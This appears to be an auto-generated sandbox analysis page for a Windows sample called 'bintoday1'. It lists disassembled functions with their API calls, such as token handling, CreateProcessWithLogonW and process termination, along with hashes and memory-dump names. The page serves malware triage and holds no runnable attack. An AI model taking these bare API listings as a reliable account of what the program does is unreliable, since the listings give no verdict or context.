Instruction ID: ca28fd79656d062224d2ab79ebbc4142f441b7c9c7a1e2e2c3dae9aeebf8b400
Opcode Fuzzy Hash: b4fe2e58b4e7d051ae9ef56b6ee5c30ef6e0a80958ae4606dc3e361a45bd77dd
Instruction Fuzzy Hash: D351B435510352EADF20AB66D8D5B39B3E8EF45310B2494F6E806DF292DB70CC40CB96

Function 00C0910C Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 383COMMON

Download Yara Rule

APIs

Part of subcall function 00B97620: _wcslen.LIBCMT ref: 00B97625

Part of subcall function 00B96B57: _wcslen.LIBCMT ref: 00B96B6A

GetOpenFileNameW.COMDLG32(00000058), ref: 00C094E5
_wcslen.LIBCMT ref: 00C09506
_wcslen.LIBCMT ref: 00C0952D
GetSaveFileNameW.COMDLG32(00000058), ref: 00C09585

Strings

X, xrefs: 00C09412

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: _wcslen$FileName$OpenSave
String ID: X
API String ID: 83654149-3081909835
Opcode ID: e095ea33d94b05eef69501a7d38e733055d038c51a85b77971f081b9b9def979
Instruction ID: 6cf4ec2571625900f173dd9e1f91293205dd9f6063d49262eccfaf3748ae83c8
Opcode Fuzzy Hash: e095ea33d94b05eef69501a7d38e733055d038c51a85b77971f081b9b9def979
Instruction Fuzzy Hash: 66E17D715083019FDB24DF25C881B6AB7E4FF85314F1489ADF8999B2A2DB31DE05CB92

Function 00BA920C Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 00BA9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00BA9BB2

BeginPaint.USER32(?,?,?), ref: 00BA9241
GetWindowRect.USER32(?,?), ref: 00BA92A5
ScreenToClient.USER32(?,?), ref: 00BA92C2
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00BA92D3
EndPaint.USER32(?,?,?,?,?), ref: 00BA9321
Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00BE71EA

Part of subcall function 00BA9339: BeginPath.GDI32(00000000), ref: 00BA9357

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
String ID:
API String ID: 3050599898-0
Opcode ID: 82c67db3aa03dbecca526d3a3e3d543853680aa56b6266cdbc12fb3aef93266f
Instruction ID: 7cef895a7425d662b0b68926518569bd9fe58623d8935ab654c2d7195fdcb16a
Opcode Fuzzy Hash: 82c67db3aa03dbecca526d3a3e3d543853680aa56b6266cdbc12fb3aef93266f
Instruction Fuzzy Hash: D041A070108300AFDB20DF25D8C5FAA7BF8EF46721F1802A9F954971A1CB719845EB62

Function 00C007EF Relevance: 9.1, APIs: 6, Instructions: 107fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 00C0080C
ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00C00847
EnterCriticalSection.KERNEL32(?), ref: 00C00863
LeaveCriticalSection.KERNEL32(?), ref: 00C008DC
ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 00C008F3
InterlockedExchange.KERNEL32(?,000001F6), ref: 00C00921

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
String ID:
API String ID: 3368777196-0
Opcode ID: fd7dae5c22ad8a86caa339706757332da7e5fffcd005801c2f4c4220704b674f
Instruction ID: e099e91953c5e838dd631f6643ed74f99c8f7eee1476bd42a7afd190c4e965bd
Opcode Fuzzy Hash: fd7dae5c22ad8a86caa339706757332da7e5fffcd005801c2f4c4220704b674f
Instruction Fuzzy Hash: 87414A71900205EBDF14AF94DC85BAE77B9FF04310F1580A5ED00AA29BDB30EE65DBA4

Function 00C281DB Relevance: 9.1, APIs: 6, Instructions: 104windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,00BEF3AB,00000000,?,?,00000000,?,00BE682C,00000004,00000000,00000000), ref: 00C2824C
EnableWindow.USER32(00000000,00000000), ref: 00C28272
ShowWindow.USER32(FFFFFFFF,00000000), ref: 00C282D1
ShowWindow.USER32(00000000,00000004), ref: 00C282E5
EnableWindow.USER32(00000000,00000001), ref: 00C2830B
SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00C2832F

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: a8f60df052547d4da34e3d00242687ac385d3a7a3edd1049cee6c299be1baf32
Instruction ID: d722211cd657fcb80eedbcc95a54c22f337281a0401dd91ae22e9dbec53ca3f5
Opcode Fuzzy Hash: a8f60df052547d4da34e3d00242687ac385d3a7a3edd1049cee6c299be1baf32
Instruction Fuzzy Hash: 6441C530602654EFDF21CF15E899BE87BE0FB0A715F1C4169E9184B672CB71A949CF50

Function 00BF4C7D Relevance: 9.1, APIs: 6, Instructions: 87windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00BF4C95
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00BF4CB2
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00BF4CEA
_wcslen.LIBCMT ref: 00BF4D08
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00BF4D10
_wcsstr.LIBVCRUNTIME ref: 00BF4D1A

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
String ID:
API String ID: 72514467-0
Opcode ID: 85c1802a23834d61c2f87a609a35fcf80c81a08586a99878ffb90b6bcd1079c0
Instruction ID: 19cd65ad9bbcaa888b5a784bb0108c4be37a7db8beaa25fe5cb55aed6cf42cea
Opcode Fuzzy Hash: 85c1802a23834d61c2f87a609a35fcf80c81a08586a99878ffb90b6bcd1079c0
Instruction Fuzzy Hash: E021D7352042057BEB255B699C89F7F7BD8DF45750F1040B9F905CB191DB61DC0596A0

Function 00C0581E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 336comCOMMON

Download Yara Rule

APIs

Part of subcall function 00B93AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00B93A97,?,?,00B92E7F,?,?,?,00000000), ref: 00B93AC2

_wcslen.LIBCMT ref: 00C0587B
CoInitialize.OLE32(00000000), ref: 00C05995
CoCreateInstance.OLE32(00C2FCF8,00000000,00000001,00C2FB68,?), ref: 00C059AE
CoUninitialize.OLE32 ref: 00C059CC

Strings

.lnk, xrefs: 00C05876, 00C058C1, 00C05985

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
String ID: .lnk
API String ID: 3172280962-24824748
Opcode ID: f30c67d709c6b662fdc239098766925eec848d6553eb5dcd4fc1eb887d135d19
Instruction ID: 46b9d230d46bf2bf60252bff5aa2c1a9a6c1c61893e056e30df2bdad8c7b3ae8
Opcode Fuzzy Hash: f30c67d709c6b662fdc239098766925eec848d6553eb5dcd4fc1eb887d135d19
Instruction Fuzzy Hash: 44D165756086019FCB14DF14C480A2BBBE5EF89710F1588ADF8999B3A1DB31ED46CF92

Function 00BF175D Relevance: 9.1, APIs: 6, Instructions: 68memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00BF0FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00BF0FCA
Part of subcall function 00BF0FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00BF0FD6
Part of subcall function 00BF0FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00BF0FE5
Part of subcall function 00BF0FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00BF0FEC
Part of subcall function 00BF0FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00BF1002

GetLengthSid.ADVAPI32(?,00000000,00BF1335), ref: 00BF17AE
GetProcessHeap.KERNEL32(00000008,00000000), ref: 00BF17BA
HeapAlloc.KERNEL32(00000000), ref: 00BF17C1
CopySid.ADVAPI32(00000000,00000000,?), ref: 00BF17DA
GetProcessHeap.KERNEL32(00000000,00000000,00BF1335), ref: 00BF17EE
HeapFree.KERNEL32(00000000), ref: 00BF17F5

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
String ID:
API String ID: 3008561057-0
Opcode ID: e8c9c6b86a6ca3fa8ff6a44caf83b982ed78fa4c1cbb3110d84ae7e85ee2fc1f
Instruction ID: 85dee16ccf0dc1b96752017a76f06da7d87870b3be015ea319f11683f359b818
Opcode Fuzzy Hash: e8c9c6b86a6ca3fa8ff6a44caf83b982ed78fa4c1cbb3110d84ae7e85ee2fc1f
Instruction Fuzzy Hash: 8211ACB1910209EFDB20EFA8CC8ABBF7BE9EB41355F104898F54597210C735AD59CB60

Function 00BF14CE Relevance: 9.1, APIs: 6, Instructions: 64processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00BF14FF
OpenProcessToken.ADVAPI32(00000000), ref: 00BF1506
CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00BF1515
CloseHandle.KERNEL32(00000004), ref: 00BF1520
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00BF154F
DestroyEnvironmentBlock.USERENV(00000000), ref: 00BF1563

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
String ID:
API String ID: 1413079979-0
Opcode ID: 10540ef2914ecda91a79d7928356ecf07d140f2c2a4556e09fc93bd1faacb04a
Instruction ID: c9385f4dcc80ff5e6c010dea30dfb361dfbc42d844b952c90370915def3e1683
Opcode Fuzzy Hash: 10540ef2914ecda91a79d7928356ecf07d140f2c2a4556e09fc93bd1faacb04a
Instruction Fuzzy Hash: 8B11597250020DEBDF21CF98DD89BEE7BA9EF48704F144854FA05A2160C375CE65DB60

Function 00BB3382 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00BB3379,00BB2FE5), ref: 00BB3390
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00BB339E
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00BB33B7
SetLastError.KERNEL32(00000000,?,00BB3379,00BB2FE5), ref: 00BB3409

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: a46b27d531b519b6e8f7f5d18e6541ac4bd69577403ba6b7c7a139ccd7bb2493
Instruction ID: 44337e336a49a9ef44909f32da2fd90a2ce27ddec4ef911003c79beec198b185
Opcode Fuzzy Hash: a46b27d531b519b6e8f7f5d18e6541ac4bd69577403ba6b7c7a139ccd7bb2493
Instruction Fuzzy Hash: C701243220C311BFAA2427B4BCC6BFF2BD4EB45B7A72002A9F411912F0EFD14D429148

Function 00BC2D74 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00BC5686,00BD3CD6,?,00000000,?,00BC5B6A,?,?,?,?,?,00BBE6D1,?,00C58A48), ref: 00BC2D78
_free.LIBCMT ref: 00BC2DAB
_free.LIBCMT ref: 00BC2DD3
SetLastError.KERNEL32(00000000,?,?,?,?,00BBE6D1,?,00C58A48,00000010,00B94F4A,?,?,00000000,00BD3CD6), ref: 00BC2DE0
SetLastError.KERNEL32(00000000,?,?,?,?,00BBE6D1,?,00C58A48,00000010,00B94F4A,?,?,00000000,00BD3CD6), ref: 00BC2DEC
_abort.LIBCMT ref: 00BC2DF2

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: e8153abbb15b5c7ce2f75ae7e781f4d491e5ebacbf29c215eeafc31442bb01be
Instruction ID: d61267e94f845a159b69a2b699585041ae9572f5513d7b98f2768fc09cf5f129
Opcode Fuzzy Hash: e8153abbb15b5c7ce2f75ae7e781f4d491e5ebacbf29c215eeafc31442bb01be
Instruction Fuzzy Hash: DBF0C835504B006BD6227734BC46F5F26D9EFD17A1F2445BCF825A22E2EF348C424160

Function 00C28A24 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 00BA9639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00BA9693
Part of subcall function 00BA9639: SelectObject.GDI32(?,00000000), ref: 00BA96A2
Part of subcall function 00BA9639: BeginPath.GDI32(?), ref: 00BA96B9
Part of subcall function 00BA9639: SelectObject.GDI32(?,00000000), ref: 00BA96E2

MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00C28A4E
LineTo.GDI32(?,00000003,00000000), ref: 00C28A62
MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00C28A70
LineTo.GDI32(?,00000000,00000003), ref: 00C28A80
EndPath.GDI32(?), ref: 00C28A90
StrokePath.GDI32(?), ref: 00C28AA0

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: Path$LineMoveObjectSelect$BeginCreateStroke
String ID:
API String ID: 43455801-0
Opcode ID: 8193864039fb3df7ffe6c4f7ce6d1532d517e0d31960ed9606d9d2db8deae954
Instruction ID: 995df57ddb48ed7ce4de961b97953b1bbcbbc9087013b713e29635ca00d1e6cd
Opcode Fuzzy Hash: 8193864039fb3df7ffe6c4f7ce6d1532d517e0d31960ed9606d9d2db8deae954
Instruction Fuzzy Hash: 85110976000118FFEF229F94DC88FAE7F6CEB08350F048012FA199A5A1C771AE55DBA0

Function 00BF51FD Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00BF5218
GetDeviceCaps.GDI32(00000000,00000058), ref: 00BF5229
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00BF5230
ReleaseDC.USER32(00000000,00000000), ref: 00BF5238
MulDiv.KERNEL32(000009EC,?,00000000), ref: 00BF524F
MulDiv.KERNEL32(000009EC,00000001,?), ref: 00BF5261

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: d37a3d483c084f76d03b89e583899b5869abce1e309fae0eb0feb555252e6953
Instruction ID: 773745748f1801c18513408017cca4b39e07a0f4bf4062048595038db310bf77
Opcode Fuzzy Hash: d37a3d483c084f76d03b89e583899b5869abce1e309fae0eb0feb555252e6953
Instruction Fuzzy Hash: F5018F75E00708BBEB209BA69C89B5EBFB8EF48751F044165FB04A7681D6709801CBA0

Function 00B91BC3 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 00B91BF4
MapVirtualKeyW.USER32(00000010,00000000), ref: 00B91BFC
MapVirtualKeyW.USER32(000000A0,00000000), ref: 00B91C07
MapVirtualKeyW.USER32(000000A1,00000000), ref: 00B91C12
MapVirtualKeyW.USER32(00000011,00000000), ref: 00B91C1A
MapVirtualKeyW.USER32(00000012,00000000), ref: 00B91C22

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: 6cf09841d197cb1d1fc95896cda4abdd21fd2f9df675327bad80e966ac43d492
Instruction ID: 28dc1c9649149a529a8732fc01372f1aec07989258bb663523ff7b2d38084cac
Opcode Fuzzy Hash: 6cf09841d197cb1d1fc95896cda4abdd21fd2f9df675327bad80e966ac43d492
Instruction Fuzzy Hash: 9C0167B0902B5ABDE3008F6A8C85B56FFA8FF19354F00411BA15C4BA42C7F5A864CBE5

Function 00BFEB20 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00BFEB30
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00BFEB46
GetWindowThreadProcessId.USER32(?,?), ref: 00BFEB55
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00BFEB64
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00BFEB6E
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00BFEB75

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: a4a7fae5c1879b26b6b2d5749399e60b801c8c5e52e8f4df11d52dec3bad964f
Instruction ID: dfed716b31fdd692133546ea5585f8c0d82d95ea0e7ee0559192c1a90deade60
Opcode Fuzzy Hash: a4a7fae5c1879b26b6b2d5749399e60b801c8c5e52e8f4df11d52dec3bad964f
Instruction Fuzzy Hash: 60F05E72250558BBE7315B629C8EFEF3E7CEFCAB11F000158F611E1491D7A05A02C6B5

Function 00BE7439 Relevance: 9.0, APIs: 6, Instructions: 37windowCOMMON

Download Yara Rule

APIs

GetClientRect.USER32(?), ref: 00BE7452
SendMessageW.USER32(?,00001328,00000000,?), ref: 00BE7469
GetWindowDC.USER32(?), ref: 00BE7475
GetPixel.GDI32(00000000,?,?), ref: 00BE7484
ReleaseDC.USER32(?,00000000), ref: 00BE7496
GetSysColor.USER32(00000005), ref: 00BE74B0

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: ClientColorMessagePixelRectReleaseSendWindow
String ID:
API String ID: 272304278-0
Opcode ID: 399181c16d4233bf599dbf04a28483797f11624ac51bf3c766266d6108220591
Instruction ID: c4805b69105149dfab02a91d1491eb6d9e0d1c61270704b3702ca713e4ce162f
Opcode Fuzzy Hash: 399181c16d4233bf599dbf04a28483797f11624ac51bf3c766266d6108220591
Instruction Fuzzy Hash: 3B018631410205EFEB319FA4DC88BAE7BB5FF04321F2400A0F926A26A0CF751E52AB50

Function 00BF1874 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 00BF187F
UnloadUserProfile.USERENV(?,?), ref: 00BF188B
CloseHandle.KERNEL32(?), ref: 00BF1894
CloseHandle.KERNEL32(?), ref: 00BF189C
GetProcessHeap.KERNEL32(00000000,?), ref: 00BF18A5
HeapFree.KERNEL32(00000000), ref: 00BF18AC

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
